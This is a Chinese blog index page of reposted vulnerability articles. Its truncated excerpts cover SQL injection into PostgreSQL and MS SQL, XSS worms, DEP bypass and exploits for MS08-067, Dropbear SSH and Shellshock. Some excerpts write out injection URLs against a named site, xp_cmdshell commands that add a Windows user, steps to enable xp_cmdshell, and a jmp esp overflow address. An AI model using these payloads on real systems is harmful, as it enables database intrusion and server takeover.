漏洞
hack8
这个作者很懒,什么都没留下…
展开
-
RPC漏洞的通用分析方法(图)
作者:Friddy一.工具准备1.IDA Pro Advanced 5.2(强大的静态逆向工具)2.HexRays(强大的可以将汇编代码转换为高质量的C代码的IDA插件)3.mIDA(极好的抽象RPC接口的IDA插件)二.找到溢出点1.补丁比较。(1)保留没有更新的文件到文件夹Old(2)打补丁,将更新后的文件放到文件夹New(3)使用“Darun Grim”等类似的补丁比较工具进行转载 2009-01-11 17:32:00 · 2759 阅读 · 0 评论 -
Hacking Postgresql for fun!
Hacking Postgresql for fun! <br />Some useful syntax reminders for SQL Injection into PostgreSQL databases...<br />This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endevoured to tabulate the data to make it easier to read转载 2011-05-17 21:49:00 · 657 阅读 · 0 评论 -
PostgreSQL 注入整理
PostgreSQL 注入整理 <br />5432端口<br />/*order by猜字段数*/<br />http://www.bug.cx/detail.php?id=236+order+by+26--<br />/*判断postgresql数据库*/<br />http://www.bug.cx/detail.php?id=236+and+1::int=1--<br />/*通过cast类型转换来暴postgresql信息*/<br />http://www.bug.cx/detail.php?i转载 2011-05-17 21:35:00 · 4657 阅读 · 0 评论 -
postpresql
<br />https://www.owasp.org/index.php/OWASP_Backend_Security_Project_Testing_PostgreSQL<br /> OWASP Backend Security Project Testing PostgreSQLFrom OWASPJump to: navigation, searchContents[hide]1Overview2Description2.1Identifying PostgreSQL2.2Blind Injecti原创 2011-05-19 00:37:00 · 892 阅读 · 0 评论 -
MS SQL 注入
--是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = x and name = xp_cmdshell) --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name password /add"-- ;exec maste转载 2011-06-04 11:21:00 · 660 阅读 · 0 评论 -
SQL注入建立虚拟目录,免得找Web绝对路径!
SQL注入建立虚拟目录,免得找Web绝对路径! 文章录入:7747.Net 责任编辑:7747.Net 更新时间:2006-4-6 8:16:46 24 【字体:小 大】 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell ’cscript C转载 2011-06-06 10:13:00 · 1056 阅读 · 1 评论 -
sql 注入攻击
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。原创 2011-06-06 09:57:00 · 700 阅读 · 0 评论 -
sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;SQL2005开启'OPENROWSET'支持的方法:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec转载 2012-04-18 18:29:03 · 1210 阅读 · 0 评论 -
Web攻击几个工具
在对Web站点进行攻击时,可能会需要用到的一些工具,仅作记录并供童鞋们查阅。 1、根据IP地址查找同一台服务器上服务的所有站点:http://sameip.org/ip/站点IP地址,更多功能可到http://sameip.org/站点上去。2、DNS查询的工具 Who.is(当然还有其他的一些查询的) ,通过查询定位站点管理员的相关信息。3、Backtrack5 大量 安全测原创 2012-05-29 19:29:18 · 3553 阅读 · 0 评论 -
At命令 无法绑定错误
对于NET USE命令,一般来说,你用ADMINISTRATOR用户把他的IPC$给隐射后,是可以获得ADMIN权限的,但是有一些人十分注意电脑的安全,他把ADMINISTRATOR这个隐藏设置了受限制的权限,怎么设置应该不用我说了吧! 我经常是在映射了IPC$之后,直接用系统管理工具管理,在XP系统中,选择右键属性→管理(就会弹出管理的窗口)→操纵→连接到另外一台计算机,然后输入IP或者计算机名转载 2012-06-05 03:29:38 · 604 阅读 · 0 评论 -
Fortinet FortiGate CRLF字符URL过滤绕过漏洞
发布时间:2008-1-16 15:15:03文章作者:ADLab文章来源:启明星辰 BUGTRAQ ID: 27276CNCAN ID:CNCAN-2008011605漏洞消息时间:2008-01-14漏洞起因设计错误影响系统Fortinet FortiGate-1000 3.00不受影响系统危害远程转载 2012-09-10 22:38:47 · 2411 阅读 · 0 评论 -
Fortinet FortiWeb Web Application Firewall Policy Bypass
From: Geffrey Velasquez Date: Wed, 2 May 2012 20:33:23 -0500BINAR10 Report on Fortinet Fortiweb Findings 02/05/2012- Fortinet FortiWeb Web Application Firewall Policy Bypass -===============转载 2012-09-10 22:42:13 · 869 阅读 · 0 评论 -
Gamma 渗透指南
_ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _转载 2014-08-23 22:02:15 · 2807 阅读 · 0 评论 -
cve-2014-6332
http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/转载 2014-11-17 18:13:54 · 1524 阅读 · 0 评论 -
ShellShock 分析记录
http://www.cnxhacker.com/2014/10/21/3015.html转载 2014-11-27 01:12:04 · 679 阅读 · 0 评论 -
DHCP 相关文章
python的dhcp库http://www.oschina.net/p/pydhcplib基于dhcp的破壳漏洞利用http://blog.trendmicro.com/trendlabs-security-intelligence/bash-bug-saga-continues-shellshock-exploit-via-dhcp/dhcp协议百科http://bai原创 2014-11-28 00:35:47 · 612 阅读 · 0 评论 -
ShellShock
https://github.com/mubix/shellshocker-pocs/tree/43592293f973b92da1edd2933903e692193e794e翻译 2014-12-05 17:17:42 · 867 阅读 · 0 评论 -
详解如何在postgresql中注入
<br />一般注入多用于在mssql和mysql两类数据库中,如mssql+asp、mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入:PostgreSQL。<br />关于PostgreSQL<br />PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),可以说是目前世界上最先进,功能最强大的自由数据转载 2011-05-17 21:46:00 · 1063 阅读 · 0 评论 -
详解如何用postgresql注入
<br />PostgreSQL是一个强大开源的关系数据库系统.它经过了15年多的开发历程,一个经得起考验的体系结构,在可靠性、数据完整性和正确性方面赢得了极好的声誉.它运行在所有主要的操作系统上,包括Linux、UNIX (AIX, BSD, HP-UX, SGI IRIX, Mac OS X, Solaris, Tru64)和Windows. 它是完全符合ACID原则,完全支持外键、联合、视图、触发器和存储过程(多种语言)。<br />它包含了SQL92和SQL99的大部分数据类型,包括INTEGER,转载 2011-05-17 21:43:00 · 1581 阅读 · 0 评论 -
MS09-002 IE7 漏洞原理分析
MS09-002 IE7 漏洞原理分析微软公司在北京时间2月11日发布了MS09-002漏洞的安全更新程序,安天实验室反病毒监测网发现利用此漏洞的攻击代码已经被发布到互联网上,如果用户没有及时安装补丁,则存在漏洞的IE7浏览器可能会在浏览网页时被病毒入侵,安天实验室提醒用户在上网时务必安装微软MS09-002漏洞补丁,以免遭受恶意病毒攻击。 安天实验室在第一时间对MS09-002 IE7转载 2009-02-22 18:08:00 · 1507 阅读 · 0 评论 -
FBController - (Facebook Control Utility) version 1.0
FBController - (Facebook Control Utility) version 1.0FBController - (Facebook Control Utility) version 1.0 Apr 30 2009 08:30PMQUAKER DOOMER (quakerdoomer inbox lv)FBController - The Ultimate Utili转载 2009-08-06 10:52:00 · 2120 阅读 · 0 评论 -
XSS wrom网站入侵实例
XSS wrom网站如何实现入侵?不说废话,且看怎么实现,我先拿SOHU BLOG做示范。 1. 测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,//前是真正的空格),在个人档案处看过滤了哪些。 ’’;:!--"=&#{()} // 结果’’;:!--"=&#{()} // (&后是amp,论坛过滤了) 过滤了"javascript"转载 2009-12-08 20:35:00 · 991 阅读 · 0 评论 -
OpenSSL PRNG(伪随机数发生器)内部状态泄露
发布日期:2001-07-11更新日期:2001-07-17受影响系统:OpenSSL Project OpenSSL 0.9.6aOpenSSL Project OpenSSL 0.9.6OpenSSL Project OpenSSL 0.9.5OpenSSL Project OpenSSL 0.9.4OpenSSL Project OpenSSL 0.9.3OpenSSL Project转载 2009-12-11 21:37:00 · 1997 阅读 · 1 评论 -
Linux x86 Dropbear SSH <= 0.34 remote root exploit
/* * /* * Linux x86 Dropbear SSH <= 0.34 remote root exploit * coded by live * * Youll need a hacked ssh client to try this out. I included a patch * to openssh-3.6.p1 somewhere below thi转载 2010-04-21 19:09:00 · 852 阅读 · 0 评论 -
Funny fake openssh 0day
Head over to PenTestIT to view a fake OpenSSH 0day called "openssh-53p1-remote-root.c". Heres the first fake shellcode: char shellcode[] = "/x23/x21/x2f/x75/x73/x72/x2f/x62/x69/x6e/x2f/x70/x65/x72/x6转载 2010-04-21 19:18:00 · 871 阅读 · 0 评论 -
Juniper Networks IVE OS homepage.cgi脚本URI重新定向漏洞
Juniper Networks IVE OS homepage.cgi脚本URI重新定向漏洞发表时间:2010-06-14 10:58:32 作者: 来源:红客联盟<br />发布日期:2010-06-10n6U中国红客联盟-全球最大的红客组织<br />更新日期:2010-06-14n6U中国红客联盟-全球最大的红客组织<br />n6U中国红客联盟-全球最大的红客组织<br />受影响系统:Juniper Networks IVE OS 6.5 R2 n6U中国红客联盟-全球最大原创 2010-06-27 16:48:00 · 302 阅读 · 0 评论 -
JUNOS (Juniper) Flaw Exposes Core Routers to Kernel Crash
JUNOS (Juniper) Flaw Exposes Core Routers to Kernel Crash<br />by Prefect on 6 January 2010<br /><br />A report has been received from Juniper at 4:25pm under bulletin PSN-2010-01-623 that a crafted malformed TCP field option in the TCP header of a原创 2010-06-27 17:00:00 · 766 阅读 · 0 评论 -
Microsoft Windows Outlook Express and Windows Mail Integer Overflow
<br />Application: Microsoft Outlook Express<br />Microsoft Windows Mail<br />Platforms: Windows 2000<br />Windows XP<br />Windows Vista<br />Windows server 2003<br />Windows Server 2008 SR2<br />Exploitation: Remote Exploitable <br />CVE Number: CVE-2010-转载 2010-06-08 21:04:00 · 626 阅读 · 0 评论 -
缓冲区溢出 jmp esp 地址
0x7ffa4512是lion分享的, 通杀中文2K,XP,2K3 . jmp esp ; 用0x7ffa4512吧, 2000, xp, 2003下通用.转载 2010-12-09 19:15:00 · 5431 阅读 · 0 评论 -
MS08-067通用bypass DEP的缓冲区溢出栈帧构造方法的学习
<br />标 题: 【原创】MS08-067通用bypass DEP的缓冲区溢出栈帧构造方法的学习<br />作 者:parachaos<br />时 间: 2009-02-09,12:32:46<br />链 接: http://bbs.pediy.com/showthread.php?t=81667<br /><br />【题目】一种在windows xp sp2 chs 和windows xp sp3 chs 系统中通用的能够bypass DEP的利用MS08-067漏洞缓冲区溢出的栈帧构造方法的学转载 2010-12-11 17:49:00 · 1470 阅读 · 0 评论 -
Bypass Hardware DEP Tips
<br />DEP(数据执行保护),是windows针对溢出的一种保护措施,分软dep和硬dep,其中硬dep是需要cpu支持的,比较新的处理器一般都支持这个选项,可以在bios里去打开。简单来说,就是堆栈不可执行了,所以一般的在堆栈里执行shellcode的exploit,会攻击失败。<br /><br />bypass dep也不是新东西了,目前最好的一篇文档是skape和skywing发在uninformed上的一篇。<br />http://www.uninformed.org/?v=2&a=4&t转载 2010-12-11 20:03:00 · 976 阅读 · 0 评论 -
How Conficker makes use of MS08-067
<br />By Bui Quang Minh & Hoang Xuan Minh<br /> <br />Conficker emerges as a hot topic recently. This is the most widespread virus since Code Red. The news has been talking so much about it that I decided to write an article too. <br /> <br />This article转载 2010-12-11 20:10:00 · 807 阅读 · 0 评论 -
New IE Zero-Day Vulnerability (CVE 2010-3962)
http://blog.bkis.com/en/new-ie-zero-day-vulnerability-cve-2010-3962/转载 2010-12-11 20:15:00 · 691 阅读 · 0 评论 -
MS08-067.c
#include <winsock2.h>#include <windows.h>#include <stdio.h>#include <io.h>#include <fcntl.h>#include <memory.h>#include <wchar.h>#include "srvsvc.h"#include "srvsvc_c.c"#include "mem.h"#pragma comment(lib,"ws2_32")#pragma comment(lib,转载 2010-12-16 12:09:00 · 1209 阅读 · 0 评论 -
渗透数据库之Sybase
<br />美国Sybase公司研制的一种关系型数据库系统,是一种典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。 Sybase提供了一套应用程序编程接口和库,可以与非Sybase数据源及服务器集成,允许在多个数据库之间复制数据,适于创建多层应用。系统具有完备的触发器、存储过程、规则以及完整性定义,支持优化查询,具有较好的数据安全性。Sybase通常与SybaseSQLAnywhere用于客户机/服务器环境,前者作为服务器数据库,后者为客户机数据库,采用该公司研制的PowerB转载 2011-01-17 22:49:00 · 945 阅读 · 0 评论 -
破壳(shellshock)漏洞的一些汇总
原理与基本情况不再赘述一、shellshock存在的环境一个攻击者能够控制的环境变量,特别是该变量以 () { 开始。必须调用bash系统必须存在bash漏洞二、目前证实适用的一些场景;CGI-based web serverCGI处理文档请求的时候,使用环境变量处理请求,如果处理使用bash脚本,或者使用了系统调用,bash将接受系统变量并进行原创 2014-12-07 00:17:08 · 1536 阅读 · 0 评论